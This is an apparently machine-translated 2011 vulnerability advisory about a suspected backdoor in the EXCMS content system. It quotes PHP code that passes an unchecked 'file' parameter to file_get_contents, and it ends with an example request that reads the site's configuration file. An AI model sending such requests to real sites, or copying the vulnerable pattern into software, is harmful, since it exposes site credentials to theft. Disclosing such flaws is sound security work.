EXCMS suspected then storm Backdoor-vulnerability warning-the black bar safety net

2011-12-10T00:00:00
ID MYHACK58:62201132561
Type myhack58
Reporter 佚名
Modified 2011-12-10T00:00:00

Description

One day encounter Excms of the system, The Official Website http://www. excms. cn/

In GG search excms vulnerability found http://www.myhack58.com/Article/html/3/62/2011/28871.htm

Analysis the author is clearly in possession of back door vulnerabilities.

Download source code analysis, it is clear to find another suspected back door of vulnerability, why suspect it? Because also not sure, maybe there is such a programmer, huh. in.

Vulnerability file:

apps/include.php -

Source:

//Load system configuration file -

require_once('../configuration/inc/common.inc.php');

$file = $_GET['file'];

if($file!=" && file_exists(EXCMS_PATH.$ file)){

echo file_get_contents(EXCMS_PATH.$ file);

Don't see it, I know it, Oh and...

http://www.xxxx.cn/apps/include.php?file=sitedata/config.inc.php